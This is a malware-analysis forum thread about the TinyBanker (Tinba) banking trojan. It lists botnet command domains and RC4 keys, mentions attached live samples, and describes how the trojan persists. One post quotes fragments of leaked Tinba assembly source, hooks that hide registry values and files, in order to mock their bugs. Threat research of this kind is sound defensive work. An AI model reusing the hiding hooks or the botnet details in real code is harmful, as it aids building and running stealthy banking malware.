A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #15023  by Peter Kleissner
 Mon Aug 06, 2012 4:21 am
Interesting, just stumbled upon another TinyBanker sample, this one is from May 1, 2012. I have counted 4 TinyBanker botnets now in total. The data of the one I have found (the sample is attached):
Code: Select all
monolitabuse.com        registered 2012-04-27
mon1olitabuse1.com      sinkholed 2012-05-02
mon2olit2abuse.com      sinkholed 2012-05-02
mo3nolitabus33e.com     sinkholed 2012-05-02
RC4 Key: wer8c7ygbw485ghw
There is a ThreatExpert report about the sample at http://www.threatexpert.com/report.aspx ... 660371c267 . Most of the domains (not all) of the other 3 botnets were listed on http://contagiodump.blogspot.se/2012/06/amazon.html and are:
Code: Select all
Botnet 1:
dakotavolandos.com
dak1otavola1ndos.com
dako22tavol2andos.com
d3akotav33olandos.com
d4ak4otavolandos.com
RC4 key: e5bb6u6wv6whvje6

Botnet 2:
monsboys.biz
ieubietubviurb.com
uwyhbgwiechgi.com
RC4 key: wer8c7ygbw485ghw

Botnet 3:
azonpowzanadinoar.com
basdinopowadoar.com
sbasdinopowadoar.com
basdinopowadoar.eu
basdinopowadoar.org
RC4 key: e5bb6u6wv6whvje6
Attachments
Pw: infected
(9.54 KiB) Downloaded 101 times
 #15062  by SecureBanking
 Wed Aug 08, 2012 7:17 pm
I just executed some samples of this trojan on my virtual machine and realized, that most of them created wrong startup-keys, respectively the binary/directory on which the key pointed doesn't existed.
So after a reboot/logoff the trojan was dead.

Edit: I guess that they were older versions.
 #16122  by Cody Johnston
 Thu Oct 18, 2012 8:02 pm
Here is a fresh sample of what behaves like Tinba. Dll in system32 folder and reg entry from AppCertDlls. Something weird about this one, it caused TDSSKiller to crash when scan was started on the PC that I pulled it from. I was unable to reproduce TDSSKiller crashing on VM.

VT 20/38

https://www.virustotal.com/file/bfdd7a1 ... /analysis/

dll and reg entries in attach
Attachments
Password: infected
(44.75 KiB) Downloaded 104 times
 #16911  by EP_X0FF
 Fri Nov 30, 2012 12:05 am
@iron12

Very good. Now go and find fresh dropper. Request removed.

For doing request here you need to meet the following requiremenets:

1) Be able to post in http://www.kernelmode.info/forum/viewforum.php?f=20
2) Share something from your side

For a dump-style vx exchange sites -> go elsewhere.
 #23335  by EP_X0FF
 Fri Jul 11, 2014 8:20 am
grum wrote::shock: 2012 old ver? it's lame and old
You are talking this like if you have most recent version and you are willing to share it (anyway it is open source trojan now).
 #23360  by EP_X0FF
 Tue Jul 15, 2014 4:37 am
Some thoughts from the industry leading experts

hxxps://www.opensc.ws/leaked-sources/19485-tinb ... -code.html

favorites:

About the language used:
I find it pretty funny to write a banking bot for windows in assembler... both stupid and funny...
About the code itself:
Code looks great the little i have checked.
About the compilation and testing environment:
I know how to compile, and compiles without errors. But doesn't work, I tested under XP SP3
I know how to compile
Join and compile!
XP SP3
About the experts programming skills:
well... firstly, C/C++ compiler in most circumstances will generate more optimized code in terms of size and speed...
About the "16-bit mode" (C):
basically nothing you can do in ASM, that you can't do with a modern C/C++ compiler (except for some really low level stuff, like 16-bit mode)
Some thoughts about crypters:
Crypters should help
should help, as always XD
About the rootkit part:
It is not rootkit.
About the reposting publically available pack of crapware source code:
then lets make the forum paid forum and these kind of sources can be posted in special access. un idea!
Conclusion: a fucken zoo.

I've only a little hope none of these monkeys will not blindly copy-paste anything from this "sources" anywhere, without checking. Otherwise the following fuckups (just a few examples from "not a rootkit" part) will be in every this "Code looks great"(C) based malware
Code: Select all
NewZwEnumerateValueKey proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword
	local RealZwEnumerateKey : dword
	local nCount : dword
	local lpName : dword

	mov RealZwEnumerateKey, eax
	mov nCount, 0

	mov eax, p4
	.if p3==0
		lea eax, (KEY_VALUE_BASIC_INFORMATION ptr [eax])._Name
	.elseif p3==1
		lea eax, (KEY_VALUE_FULL_INFORMATION ptr [eax])._Name
	.else
		xor eax, eax
		push p2
		pop nCount
	.endif
	mov lpName, eax

@RealZwEnumerateKey:
	push p6					; ResultLength
	push p5					; Length
	push p4					; KeyValueInformation
	push p3					; KeyValueInformationClass
	push nCount				; Index
	push p1					; KeyHandle
	call RealZwEnumerateKey	; Real ZwEnumerateValueKey
	.if eax!=STATUS_SUCCESS
Code: Select all
NewZwQueryDirectoryFile proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword, p7:dword, p8:dword, p9:dword, p10:dword, p11:dword
	local RealZwQueryDirectoryFile : dword

	mov RealZwQueryDirectoryFile, eax

@NextQuery:
	push p11						; RestartScan
	push p10						; FileName
	push p9							; ReturnSingleEntry
	push p8							; FileInformationClass
	push p7							; FileInformationLength
	push p6							; FileInformation
	push p5							; IoStatusBlock
	push p4							; ApcContext
	push p3							; ApcRoutine
	push p2							; Event
	push p1							; FileHandle
	call RealZwQueryDirectoryFile	; Real ZwQueryDirectoryFile
	.if eax!=STATUS_SUCCESS
		ret
Code: Select all
	assume eax : ptr FILE_BOTH_DIRECTORY_INFORMATION, edx : ptr FILE_BOTH_DIRECTORY_INFORMATION
	mov eax, p6